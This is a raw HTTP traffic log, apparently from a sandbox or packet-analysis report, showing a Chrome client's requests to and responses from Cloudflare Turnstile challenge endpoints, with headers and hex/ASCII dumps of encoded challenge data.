2024-11-18 16:55:54 UTC	428	OUT	GET /cdn-cgi/challenge-platform/h/b/i/8e497d813cb62ff4/1731948951564/p8JSJGxodSL51Dr HTTP/1.1 Host: challenges.cloudflare.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-11-18 16:55:54 UTC	200	IN	HTTP/1.1 200 OK Date: Mon, 18 Nov 2024 16:55:54 GMT Content-Type: image/png Content-Length: 61 Connection: close Server: cloudflare CF-RAY: 8e497da6c8be3acd-DFW alt-svc: h3=":443"; ma=86400
2024-11-18 16:55:54 UTC	61	IN	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 63 00 00 00 62 08 02 00 00 00 cb 05 fa 67 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82 Data Ascii: PNGIHDRcbgIDAT$IENDB`

Timestamp	Bytes transferred	Direction	Data
2024-11-18 16:55:55 UTC	814	OUT	GET /cdn-cgi/challenge-platform/h/b/pat/8e497d813cb62ff4/1731948951576/044ddceecbee23a905e087f0dcbf9c62295d312b4bb3ef95c5855d29fd2991d0/qFAA1Rd1fZGxcNU HTTP/1.1 Host: challenges.cloudflare.com Connection: keep-alive Cache-Control: max-age=0 sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: / Sec-Fetch-Site: same-origin Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/y1j5m/0x4AAAAAAAhkfK1nz8jjG-wE/auto/fbE/normal/auto/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-11-18 16:55:55 UTC	143	IN	HTTP/1.1 401 Unauthorized Date: Mon, 18 Nov 2024 16:55:55 GMT Content-Type: text/plain; charset=UTF-8 Content-Length: 1 Connection: close
2024-11-18 16:55:55 UTC	2015	IN	Data Raw: 77 77 77 2d 61 75 74 68 65 6e 74 69 63 61 74 65 3a 20 50 72 69 76 61 74 65 54 6f 6b 65 6e 20 63 68 61 6c 6c 65 6e 67 65 3d 22 41 41 49 41 47 58 42 68 64 43 31 70 63 33 4e 31 5a 58 49 75 59 32 78 76 64 57 52 6d 62 47 46 79 5a 53 35 6a 62 32 30 67 42 45 33 63 37 73 76 75 49 36 6b 46 34 49 66 77 33 4c 2d 63 59 69 6c 64 4d 53 74 4c 73 2d 2d 56 78 59 56 64 4b 66 30 70 6b 64 41 41 47 57 4e 6f 59 57 78 73 5a 57 35 6e 5a 58 4d 75 59 32 78 76 64 57 52 6d 62 47 46 79 5a 53 35 6a 62 32 30 3d 22 2c 20 74 6f 6b 65 6e 2d 6b 65 79 3d 22 4d 49 49 42 55 6a 41 39 42 67 6b 71 68 6b 69 47 39 77 30 42 41 51 6f 77 4d 4b 41 4e 4d 41 73 47 43 57 43 47 53 41 46 6c 41 77 51 43 41 71 45 61 4d 42 67 47 43 53 71 47 53 49 62 33 44 51 45 42 43 44 41 4c 42 67 6c 67 68 6b 67 42 5a 51 4d Data Ascii: www-authenticate: PrivateToken challenge="AAIAGXBhdC1pc3N1ZXIuY2xvdWRmbGFyZS5jb20gBE3c7svuI6kF4Ifw3L-cYildMStLs--VxYVdKf0pkdAAGWNoYWxsZW5nZXMuY2xvdWRmbGFyZS5jb20=", token-key="MIIBUjA9BgkqhkiG9w0BAQowMKANMAsGCWCGSAFlAwQCAqEaMBgGCSqGSIb3DQEBCDALBglghkgBZQM
2024-11-18 16:55:55 UTC	1	IN	Data Raw: 4a Data Ascii: J

Timestamp	Bytes transferred	Direction	Data
2024-11-18 16:55:56 UTC	1151	OUT	POST /cdn-cgi/challenge-platform/h/b/flow/ov1/1934195006:1731948353:unz671KSRq1ToGyOHQQkK3w4rNHjodEQ7ar4OrQ9NOM/8e497d813cb62ff4/MDvrsZI1VGmqlLbJRpJUmll3UtGGVQo4c3IEyGk_pTQ-1731948948-1.1.1.1-tjPxUzHkLuXL14nwMEaUPUlXPG6NhyXQNVxCbHUc0PNpbzwGotvMckMqufOiL4HB HTTP/1.1 Host: challenges.cloudflare.com Connection: keep-alive Content-Length: 31998 sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" Content-type: application/x-www-form-urlencoded sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 CF-Challenge: MDvrsZI1VGmqlLbJRpJUmll3UtGGVQo4c3IEyGk_pTQ-1731948948-1.1.1.1-tjPxUzHkLuXL14nwMEaUPUlXPG6NhyXQNVxCbHUc0PNpbzwGotvMckMqufOiL4HB sec-ch-ua-platform: "Windows" Accept: / Origin: https://challenges.cloudflare.com Sec-Fetch-Site: same-origin Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/y1j5m/0x4AAAAAAAhkfK1nz8jjG-wE/auto/fbE/normal/auto/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-11-18 16:55:56 UTC	16384	OUT	Data Raw: 76 5f 38 65 34 39 37 64 38 31 33 63 62 36 32 66 66 34 3d 42 61 6b 53 72 4c 66 77 49 74 49 54 49 66 6f 66 62 5a 70 5a 31 56 36 5a 72 5a 32 5a 62 67 66 74 66 34 5a 38 53 51 74 66 37 5a 42 43 63 77 6d 5a 6a 6b 53 4d 43 36 64 61 66 71 5a 6e 59 55 5a 66 49 75 57 5a 75 67 66 44 4c 5a 4d 6b 5a 63 68 5a 36 6d 5a 73 72 68 61 53 5a 57 48 53 66 24 75 4c 4d 66 4c 54 5a 45 53 36 74 5a 4c 58 59 46 5a 39 5a 63 41 37 65 4a 53 54 57 4b 5a 64 58 4a 53 66 39 47 72 49 24 24 5a 52 53 56 2d 49 49 54 78 5a 66 25 32 62 5a 4e 50 37 38 53 5a 6e 5a 5a 2b 56 5a 36 2b 37 2d 4e 59 39 4d 79 58 4c 4a 4d 58 61 37 6b 5a 4d 79 79 72 44 4c 31 51 56 63 53 66 72 4d 53 52 57 76 53 5a 42 75 67 5a 32 35 6e 78 78 77 49 66 55 74 72 6b 62 79 6e 71 65 6b 73 54 4b 50 39 70 62 44 75 2d 39 50 70 62 4c Data Ascii: v_8e497d813cb62ff4=BakSrLfwItITIfofbZpZ1V6ZrZ2Zbgftf4Z8SQtf7ZBCcwmZjkSMC6dafqZnYUZfIuWZugfDLZMkZchZ6mZsrhaSZWHSf$uLMfLTZES6tZLXYFZ9ZcA7eJSTWKZdXJSf9GrI$$ZRSV-IITxZf%2bZNP78SZnZZ+VZ6+7-NY9MyXLJMXa7kZMyyrDL1QVcSfrMSRWvSZBugZ25nxxwIfUtrkbynqeksTKP9pbDu-9PpbL
2024-11-18 16:55:56 UTC	15614	OUT	Data Raw: 55 53 32 33 6a 36 6b 54 6b 24 4c 75 5a 45 37 6f 43 57 6b 5a 5a 31 7a 6d 5a 6f 5a 76 5a 69 69 51 31 6f 4e 61 54 5a 4c 54 53 42 43 42 69 5a 56 53 7a 4b 5a 49 58 4b 5a 35 30 48 30 61 69 53 33 53 66 78 4b 6b 5a 24 5a 5a 79 51 6b 58 69 53 5a 46 66 58 5a 73 5a 4c 53 4c 54 53 4b 64 6b 6f 5a 42 5a 4d 53 74 43 4c 4c 5a 24 53 35 4f 6a 77 5a 6d 46 4c 6b 51 58 5a 30 53 4c 49 73 49 5a 62 5a 5a 2d 5a 36 5a 38 53 63 5a 66 37 65 51 67 42 37 51 2d 67 79 5a 66 24 66 71 43 62 53 66 49 4c 2d 5a 6a 77 36 2d 4c 62 5a 44 36 42 6e 55 79 5a 2b 53 5a 61 51 69 5a 30 30 53 65 4c 54 53 38 53 31 72 61 73 67 51 6f 53 2d 66 2d 5a 75 43 42 6b 66 31 53 68 5a 6e 5a 63 73 53 46 5a 6b 53 32 6b 5a 57 5a 4d 53 5a 63 5a 69 5a 5a 46 5a 78 5a 73 5a 63 4e 53 76 45 63 53 6f 67 66 36 5a 78 53 4c 4b Data Ascii: US23j6kTk$LuZE7oCWkZZ1zmZoZvZiiQ1oNaTZLTSBCBiZVSzKZIXKZ50H0aiS3SfxKkZ$ZZyQkXiSZFfXZsZLSLTSKdkoZBZMStCLLZ$S5OjwZmFLkQXZ0SLIsIZbZZ-Z6Z8ScZf7eQgB7Q-gyZf$fqCbSfIL-Zjw6-LbZD6BnUyZ+SZaQiZ00SeLTS8S1rasgQoS-f-ZuCBkf1ShZnZcsSFZkS2kZWZMSZcZiZZFZxZsZcNSvEcSogf6ZxSLK
2024-11-18 16:55:56 UTC	330	IN	HTTP/1.1 200 OK Date: Mon, 18 Nov 2024 16:55:56 GMT Content-Type: text/plain; charset=UTF-8 Content-Length: 26328 Connection: close cf-chl-gen: iAoBre/rzEBmYR3xmn46VgmAqzTsU2kpa+XOGJZkxWVUxcp3/Ak8WyTIwI282NeHlcu5QVi/osXb7kON$XYlBgmowL1Fmh6JI Server: cloudflare CF-RAY: 8e497db0f9d76bb3-DFW alt-svc: h3=":443"; ma=86400
2024-11-18 16:55:56 UTC	1039	IN	Data Raw: 71 58 69 4d 77 5a 61 66 6c 72 47 57 79 4a 61 7a 6e 4d 50 49 6d 62 71 6e 71 71 57 4d 30 4b 71 70 6b 4e 53 55 76 4b 62 59 31 39 4b 62 79 39 79 75 7a 72 76 59 74 61 50 56 31 39 57 6c 72 63 48 43 75 63 43 39 36 4b 76 67 37 39 57 7a 7a 75 76 54 74 61 2f 4e 30 73 6e 67 7a 66 79 38 78 51 44 67 78 74 30 46 32 66 62 6a 42 64 6e 4c 35 74 30 41 43 78 41 52 35 77 50 76 45 65 66 54 47 75 33 62 47 41 77 64 39 41 2f 37 48 4f 44 65 4a 2f 37 32 33 69 59 4b 41 2f 6f 6e 2f 53 66 77 4d 51 49 6e 41 53 55 38 48 50 4d 54 4f 43 37 37 4c 44 30 58 4c 78 78 45 42 67 4a 46 47 69 52 4b 43 45 68 4d 44 77 77 39 49 68 49 52 44 68 42 56 45 68 67 39 4e 55 35 62 4d 69 78 58 4d 6c 59 63 4a 6c 68 52 49 57 56 4b 54 44 56 44 63 46 73 74 4d 57 74 49 53 6b 6c 79 5a 54 4a 4b 55 47 39 70 5a 33 56 Data Ascii: qXiMwZaflrGWyJaznMPImbqnqqWM0KqpkNSUvKbY19Kby9yuzrvYtaPV19WlrcHCucC96Kvg79WzzuvTta/N0sngzfy8xQDgxt0F2fbjBdnL5t0ACxAR5wPvEefTGu3bGAwd9A/7HODeJ/723iYKA/on/SfwMQInASU8HPMTOC77LD0XLxxEBgJFGiRKCEhMDww9IhIRDhBVEhg9NU5bMixXMlYcJlhRIWVKTDVDcFstMWtISklyZTJKUG9pZ3V
2024-11-18 16:55:56 UTC	1369	IN	Data Raw: 48 6d 62 72 53 6e 39 50 4f 6f 4b 62 56 77 62 71 52 30 71 53 58 6e 73 32 78 33 63 4c 58 7a 39 76 67 33 4c 62 70 76 71 57 70 36 38 4c 4f 34 4f 2f 47 30 72 37 7a 79 74 66 34 39 38 37 62 37 2b 7a 49 37 4c 6e 61 77 62 72 75 7a 74 36 2f 33 51 72 36 32 51 77 44 41 78 48 47 42 64 2f 38 7a 67 76 69 44 39 67 51 39 52 73 46 47 76 54 65 37 68 58 65 45 51 51 52 41 67 59 5a 39 78 34 46 43 2b 55 5a 36 53 63 63 4c 69 6b 54 37 53 59 44 4d 77 6b 55 4b 66 63 61 4e 42 34 33 45 52 77 78 44 2f 30 55 52 6a 51 59 53 50 30 64 50 67 6b 4b 53 68 77 6e 4a 55 4d 65 46 7a 56 4e 4a 45 73 73 4b 42 41 70 58 30 38 33 51 6b 42 42 54 69 42 45 55 7a 63 35 4e 43 56 5a 57 30 6c 6c 50 31 4a 79 59 44 52 32 57 48 46 54 64 32 35 4a 54 6b 6f 34 65 47 4d 31 65 6f 4a 44 68 6e 53 46 69 33 78 59 52 45 Data Ascii: HmbrSn9POoKbVwbqR0qSXns2x3cLXz9vg3LbpvqWp68LO4O/G0r7zytf4987b7+zI7Lnawbruzt6/3Qr62QwDAxHGBd/8zgviD9gQ9RsFGvTe7hXeEQQRAgYZ9x4FC+UZ6SccLikT7SYDMwkUKfcaNB43ERwxD/0URjQYSP0dPgkKShwnJUMeFzVNJEssKBApX083QkBBTiBEUzc5NCVZW0llP1JyYDR2WHFTd25JTko4eGM1eoJDhnSFi3xYRE
2024-11-18 16:55:56 UTC	1369	IN	Data Raw: 74 70 62 47 71 4b 47 52 78 62 7a 46 72 4d 75 62 77 63 37 56 7a 4e 44 6c 75 74 6a 53 74 4e 72 41 71 38 62 64 36 63 76 51 77 50 48 6a 35 75 6e 74 39 38 50 5a 32 72 58 32 33 38 37 4f 37 50 4f 39 31 2b 4c 41 38 67 50 55 34 77 6e 6a 39 67 6e 6c 36 76 76 30 46 75 6a 50 38 76 62 6f 42 2b 51 4e 31 51 66 61 30 67 44 62 37 69 48 6b 42 42 67 6e 34 53 6e 70 41 68 38 6a 35 69 7a 75 46 41 77 6c 45 41 6b 44 43 41 6b 32 39 69 6b 6e 48 2f 6b 42 4d 67 34 6a 4e 30 41 63 4d 68 38 2f 4c 41 59 69 53 79 63 43 45 55 73 2f 53 44 45 6d 4e 30 68 48 57 56 6f 59 57 45 74 49 47 54 63 78 52 42 31 69 58 31 41 69 4b 56 6f 32 53 6a 6c 6f 52 46 70 48 61 30 73 77 4a 32 4e 66 4e 44 6b 33 58 46 52 73 65 44 70 35 67 6f 42 68 55 59 4a 34 64 6e 57 44 52 6b 68 4b 59 32 4a 71 61 30 69 54 57 34 43 Data Ascii: tpbGqKGRxbzFrMubwc7VzNDlutjStNrAq8bd6cvQwPHj5unt98PZ2rX2387O7PO91+LA8gPU4wnj9gnl6vv0FujP8vboB+QN1Qfa0gDb7iHkBBgn4SnpAh8j5izuFAwlEAkDCAk29iknH/kBMg4jN0AcMh8/LAYiSycCEUs/SDEmN0hHWVoYWEtIGTcxRB1iX1AiKVo2SjloRFpHa0swJ2NfNDk3XFRseDp5goBhUYJ4dnWDRkhKY2Jqa0iTW4C
2024-11-18 16:55:56 UTC	1369	IN	Data Raw: 4a 54 56 70 35 61 2f 33 39 32 38 7a 72 53 2f 34 4a 2f 59 34 4e 36 69 71 2b 7a 4b 76 74 6d 36 38 4e 2f 57 35 4f 33 31 34 65 6a 62 78 39 33 73 75 75 6e 68 38 4c 2f 34 30 4e 44 50 2b 64 7a 56 31 4e 77 48 79 2b 7a 70 36 2f 76 6c 42 75 63 57 36 65 45 49 38 2b 6b 4d 38 51 33 75 38 42 6a 35 44 68 45 54 46 64 34 56 45 77 7a 6c 47 43 63 4d 36 67 62 2b 4c 53 55 72 48 2f 41 58 38 43 73 34 4b 68 54 76 47 2f 59 50 44 7a 6a 38 4f 69 34 41 41 44 49 64 50 77 4d 4a 4c 43 59 2b 4d 6a 41 6f 51 6b 45 4f 50 78 4d 4c 56 52 5a 4e 55 56 68 48 57 31 5a 4d 4d 44 31 44 48 6c 45 69 59 54 64 47 53 68 38 39 59 45 55 6a 4b 6c 35 74 55 30 55 76 64 6d 52 49 52 56 42 61 53 6b 70 36 58 6b 35 4d 66 6d 4a 56 4f 59 4a 6d 57 55 46 56 5a 33 6c 33 66 6e 78 66 55 6d 64 78 64 57 42 50 67 56 70 75 Data Ascii: JTVp5a/3928zrS/4J/Y4N6iq+zKvtm68N/W5O314ejbx93suunh8L/40NDP+dzV1NwHy+zp6/vlBucW6eEI8+kM8Q3u8Bj5DhETFd4VEwzlGCcM6gb+LSUrH/AX8Cs4KhTvG/YPDzj8Oi4AADIdPwMJLCY+MjAoQkEOPxMLVRZNUVhHW1ZMMD1DHlEiYTdGSh89YEUjKl5tU0UvdmRIRVBaSkp6Xk5MfmJVOYJmWUFVZ3l3fnxfUmdxdWBPgVpu
2024-11-18 16:55:56 UTC	1369	IN	Data Raw: 43 73 30 5a 32 66 72 36 48 6c 33 4f 58 6d 34 4c 66 6b 72 4f 44 6e 37 65 4b 6e 79 2b 2b 79 36 76 6a 63 79 74 72 57 34 4c 6a 57 36 75 53 38 39 4f 4c 6c 77 4f 72 69 78 38 77 45 36 51 33 34 44 63 37 53 34 68 55 41 39 51 33 72 44 75 38 52 31 52 6a 5a 48 42 6f 6a 37 74 34 41 41 52 67 42 39 68 67 4b 2f 68 6f 76 2b 75 76 6f 36 77 6f 72 49 2f 41 47 4d 42 59 55 50 66 73 74 2b 41 41 56 41 67 77 42 2f 68 46 46 42 67 49 47 49 79 67 49 54 53 73 77 4d 54 30 51 50 79 52 56 53 6a 59 35 4b 43 63 34 55 79 77 75 54 55 42 4f 4c 30 52 44 52 79 56 4a 52 30 73 6d 57 32 41 37 4b 55 30 2b 5a 53 35 65 4c 55 74 56 56 57 39 48 55 31 31 4d 55 7a 35 73 4f 56 73 36 59 48 70 59 54 33 52 58 57 33 68 36 61 34 31 50 65 55 6d 4a 55 58 31 69 6c 55 32 42 64 35 6d 4b 68 57 70 72 58 34 36 56 66 Data Ascii: Cs0Z2fr6Hl3OXm4LfkrODn7eKny++y6vjcytrW4LjW6uS89OLlwOrix8wE6Q34Dc7S4hUA9Q3rDu8R1RjZHBoj7t4AARgB9hgK/hov+uvo6worI/AGMBYUPfst+AAVAgwB/hFFBgIGIygITSswMT0QPyRVSjY5KCc4UywuTUBOL0RDRyVJR0smW2A7KU0+ZS5eLUtVVW9HU11MUz5sOVs6YHpYT3RXW3h6a41PeUmJUX1ilU2Bd5mKhWprX46Vf
2024-11-18 16:55:56 UTC	1369	IN	Data Raw: 6d 74 4b 48 71 34 65 50 74 78 4e 6d 79 37 2b 33 4d 73 2f 48 79 34 62 6a 33 33 65 6d 39 2b 75 72 70 34 51 44 43 7a 77 61 39 33 41 76 4b 31 67 6f 4d 32 39 6a 2b 35 65 49 56 36 2b 67 58 34 41 66 78 34 75 62 6b 46 2f 4c 70 33 2f 54 59 37 51 30 54 37 69 63 69 34 75 63 6d 34 69 59 76 4c 79 6f 75 37 69 66 79 4e 75 34 33 4d 43 62 34 4e 68 41 4e 2f 51 6b 5a 2b 42 46 45 47 55 51 5a 45 6a 63 64 43 78 64 4b 54 78 6b 47 54 30 5a 49 55 69 6b 2b 46 31 52 53 4d 52 68 57 56 30 59 64 58 45 4a 4f 49 6c 39 50 54 6b 5a 6b 4a 7a 52 71 49 6b 46 73 51 54 70 66 54 6b 46 30 50 56 5a 46 51 46 41 30 4e 6e 70 36 50 56 42 33 51 45 31 52 67 57 35 2b 69 44 71 43 58 56 6d 49 53 34 4a 75 6a 57 52 78 59 59 64 54 6b 70 57 53 68 70 68 6c 5a 56 4e 78 63 32 71 50 6d 47 31 57 6b 34 4a 31 71 48 Data Ascii: mtKHq4ePtxNmy7+3Ms/Hy4bj33em9+urp4QDCzwa93AvK1goM29j+5eIV6+gX4Afx4ubkF/Lp3/TY7Q0T7ici4ucm4iYvLyou7ifyNu43MCb4NhAN/QkZ+BFEGUQZEjcdCxdKTxkGT0ZIUik+F1RSMRhWV0YdXEJOIl9PTkZkJzRqIkFsQTpfTkF0PVZFQFA0Nnp6PVB3QE1RgW5+iDqCXVmIS4JujWRxYYdTkpWShphlZVNxc2qPmG1Wk4J1qH
2024-11-18 16:55:56 UTC	1369	IN	Data Raw: 33 64 2b 2f 75 2b 4b 73 76 38 44 51 39 38 6e 44 2b 74 58 4b 73 63 6a 64 31 38 37 4d 31 64 44 50 39 75 58 57 30 2b 54 73 79 64 6a 2b 37 64 33 62 45 2b 33 6b 33 77 63 45 34 2b 54 7a 44 4f 7a 6e 36 4f 33 73 37 76 7a 78 38 50 44 77 46 50 58 64 39 41 37 35 2b 43 38 4b 2b 76 37 38 41 67 77 42 4a 78 6e 31 42 53 73 38 44 51 6b 4a 4c 41 38 4e 4d 77 34 55 45 54 59 34 47 68 55 37 47 69 51 59 54 7a 77 66 48 78 30 75 49 77 6f 68 52 43 6f 6b 4a 53 6f 71 4b 45 38 71 4c 69 78 6a 52 53 49 78 5a 7a 59 34 4e 46 74 47 4f 54 68 4a 63 45 41 38 4b 32 52 47 51 47 64 53 52 30 56 37 53 6b 31 4c 53 56 70 4c 4e 6b 31 4f 55 31 4e 68 55 6c 52 55 69 32 70 6b 57 56 6c 4d 54 6c 32 44 61 6d 42 67 59 58 70 71 5a 5a 74 6d 5a 31 4a 70 61 6e 4a 74 62 59 5a 31 63 4b 64 2b 65 6e 53 45 6e 48 68 Data Ascii: 3d+/u+Ksv8DQ98nD+tXKscjd187M1dDP9uXW0+Tsydj+7d3bE+3k3wcE4+TzDOzn6O3s7vzx8PDwFPXd9A75+C8K+v78AgwBJxn1BSs8DQkJLA8NMw4UETY4GhU7GiQYTzwfHx0uIwohRCokJSoqKE8qLixjRSIxZzY4NFtGOThJcEA8K2RGQGdSR0V7Sk1LSVpLNk1OU1NhUlRUi2pkWVlMTl2DamBgYXpqZZtmZ1JpanJtbYZ1cKd+enSEnHh
2024-11-18 16:55:56 UTC	1369	IN	Data Raw: 65 6e 4b 71 39 54 7a 36 62 65 35 38 2b 37 31 33 62 58 56 2b 39 63 48 76 67 72 79 76 64 54 32 7a 67 67 4c 2f 74 45 49 45 67 54 6a 34 4d 37 53 45 78 76 53 48 67 66 52 36 41 4c 77 32 52 49 57 47 66 45 54 45 2b 6b 67 4b 68 34 4b 37 69 67 79 4b 79 6b 69 43 42 49 77 4d 44 73 37 4d 53 72 33 2b 54 51 76 4e 69 54 31 46 6a 67 59 50 43 41 36 4b 78 59 75 42 41 70 46 54 30 63 68 43 69 59 55 45 6b 77 50 46 42 5a 52 53 31 4a 4b 45 6a 49 5a 4e 46 6b 38 56 6c 45 79 53 6b 45 6d 58 6d 74 6a 50 53 5a 43 62 79 35 72 54 44 42 49 61 7a 59 35 52 33 52 56 63 30 30 32 55 6c 6b 2b 64 30 4a 46 55 34 42 32 52 45 5a 2f 53 6b 31 63 69 47 6d 48 59 55 70 6d 6c 31 4b 4c 56 6c 6c 6f 6c 49 70 59 57 70 4e 65 59 58 47 63 66 5a 74 31 58 6e 70 6b 5a 70 39 71 62 58 32 6f 6e 6d 78 75 70 33 4a 31 Data Ascii: enKq9Tz6be58+713bXV+9cHvgryvdT2zggL/tEIEgTj4M7SExvSHgfR6ALw2RIWGfETE+kgKh4K7igyKykiCBIwMDs7MSr3+TQvNiT1FjgYPCA6KxYuBApFT0chCiYUEkwPFBZRS1JKEjIZNFk8VlEySkEmXmtjPSZCby5rTDBIazY5R3RVc002Ulk+d0JFU4B2REZ/Sk1ciGmHYUpml1KLVllolIpYWpNeYXGcfZt1XnpkZp9qbX2onmxup3J1

Timestamp	Bytes transferred	Direction	Data
2024-11-18 16:55:57 UTC	599	OUT	GET /cdn-cgi/challenge-platform/h/b/flow/ov1/1934195006:1731948353:unz671KSRq1ToGyOHQQkK3w4rNHjodEQ7ar4OrQ9NOM/8e497d813cb62ff4/MDvrsZI1VGmqlLbJRpJUmll3UtGGVQo4c3IEyGk_pTQ-1731948948-1.1.1.1-tjPxUzHkLuXL14nwMEaUPUlXPG6NhyXQNVxCbHUc0PNpbzwGotvMckMqufOiL4HB HTTP/1.1 Host: challenges.cloudflare.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-11-18 16:55:57 UTC	379	IN	HTTP/1.1 404 Not Found Date: Mon, 18 Nov 2024 16:55:57 GMT Content-Type: application/json Content-Length: 7 Connection: close cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0 cf-chl-out: sQdPlVolUZWPsIUQkYK9hw0iSOpZytk4aj4=$dGb2SmUqG5RJlwkr Server: cloudflare CF-RAY: 8e497db89c316c52-DFW alt-svc: h3=":443"; ma=86400
2024-11-18 16:55:57 UTC	7	IN	Data Raw: 69 6e 76 61 6c 69 64 Data Ascii: invalid

Timestamp	Bytes transferred	Direction	Data
2024-11-18 16:55:59 UTC	1151	OUT	POST /cdn-cgi/challenge-platform/h/b/flow/ov1/1934195006:1731948353:unz671KSRq1ToGyOHQQkK3w4rNHjodEQ7ar4OrQ9NOM/8e497d813cb62ff4/MDvrsZI1VGmqlLbJRpJUmll3UtGGVQo4c3IEyGk_pTQ-1731948948-1.1.1.1-tjPxUzHkLuXL14nwMEaUPUlXPG6NhyXQNVxCbHUc0PNpbzwGotvMckMqufOiL4HB HTTP/1.1 Host: challenges.cloudflare.com Connection: keep-alive Content-Length: 34417 sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" Content-type: application/x-www-form-urlencoded sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 CF-Challenge: MDvrsZI1VGmqlLbJRpJUmll3UtGGVQo4c3IEyGk_pTQ-1731948948-1.1.1.1-tjPxUzHkLuXL14nwMEaUPUlXPG6NhyXQNVxCbHUc0PNpbzwGotvMckMqufOiL4HB sec-ch-ua-platform: "Windows" Accept: / Origin: https://challenges.cloudflare.com Sec-Fetch-Site: same-origin Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/y1j5m/0x4AAAAAAAhkfK1nz8jjG-wE/auto/fbE/normal/auto/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-11-18 16:55:59 UTC	16384	OUT	Data Raw: 76 5f 38 65 34 39 37 64 38 31 33 63 62 36 32 66 66 34 3d 42 61 6b 53 72 4c 66 77 49 74 49 54 49 66 6f 66 62 5a 70 5a 31 56 36 5a 72 5a 32 5a 62 67 66 74 66 34 5a 38 53 51 74 66 37 5a 42 43 63 77 6d 5a 6a 6b 53 4d 43 36 64 61 66 71 5a 6e 59 55 5a 66 49 75 57 5a 75 67 66 44 4c 5a 4d 6b 5a 63 68 5a 36 6d 5a 73 72 68 61 53 5a 57 48 53 66 24 75 4c 4d 66 4c 54 5a 45 53 36 74 5a 4c 58 59 46 5a 39 5a 63 41 37 65 4a 53 54 57 4b 5a 64 58 4a 53 66 39 47 72 49 24 24 5a 52 53 56 2d 49 49 54 78 5a 66 25 32 62 5a 4e 50 37 38 53 5a 6e 5a 5a 2b 56 5a 36 2b 37 2d 4e 59 39 4d 79 58 4c 4a 4d 58 61 37 6b 5a 4d 79 79 72 44 4c 31 51 56 63 53 66 72 4d 53 52 57 76 53 5a 42 75 67 5a 32 35 6e 78 78 77 49 66 55 74 72 6b 62 79 6e 71 65 6b 73 54 4b 50 39 70 62 44 75 2d 39 50 70 62 4c Data Ascii: v_8e497d813cb62ff4=BakSrLfwItITIfofbZpZ1V6ZrZ2Zbgftf4Z8SQtf7ZBCcwmZjkSMC6dafqZnYUZfIuWZugfDLZMkZchZ6mZsrhaSZWHSf$uLMfLTZES6tZLXYFZ9ZcA7eJSTWKZdXJSf9GrI$$ZRSV-IITxZf%2bZNP78SZnZZ+VZ6+7-NY9MyXLJMXa7kZMyyrDL1QVcSfrMSRWvSZBugZ25nxxwIfUtrkbynqeksTKP9pbDu-9PpbL
2024-11-18 16:55:59 UTC	16384	OUT	Data Raw: 55 53 32 33 6a 36 6b 54 6b 24 4c 75 5a 45 37 6f 43 57 6b 5a 5a 31 7a 6d 5a 6f 5a 76 5a 69 69 51 31 6f 4e 61 54 5a 4c 54 53 42 43 42 69 5a 56 53 7a 4b 5a 49 58 4b 5a 35 30 48 30 61 69 53 33 53 66 78 4b 6b 5a 24 5a 5a 79 51 6b 58 69 53 5a 46 66 58 5a 73 5a 4c 53 4c 54 53 4b 64 6b 6f 5a 42 5a 4d 53 74 43 4c 4c 5a 24 53 35 4f 6a 77 5a 6d 46 4c 6b 51 58 5a 30 53 4c 49 73 49 5a 62 5a 5a 2d 5a 36 5a 38 53 63 5a 66 37 65 51 67 42 37 51 2d 67 79 5a 66 24 66 71 43 62 53 66 49 4c 2d 5a 6a 77 36 2d 4c 62 5a 44 36 42 6e 55 79 5a 2b 53 5a 61 51 69 5a 30 30 53 65 4c 54 53 38 53 31 72 61 73 67 51 6f 53 2d 66 2d 5a 75 43 42 6b 66 31 53 68 5a 6e 5a 63 73 53 46 5a 6b 53 32 6b 5a 57 5a 4d 53 5a 63 5a 69 5a 5a 46 5a 78 5a 73 5a 63 4e 53 76 45 63 53 6f 67 66 36 5a 78 53 4c 4b Data Ascii: 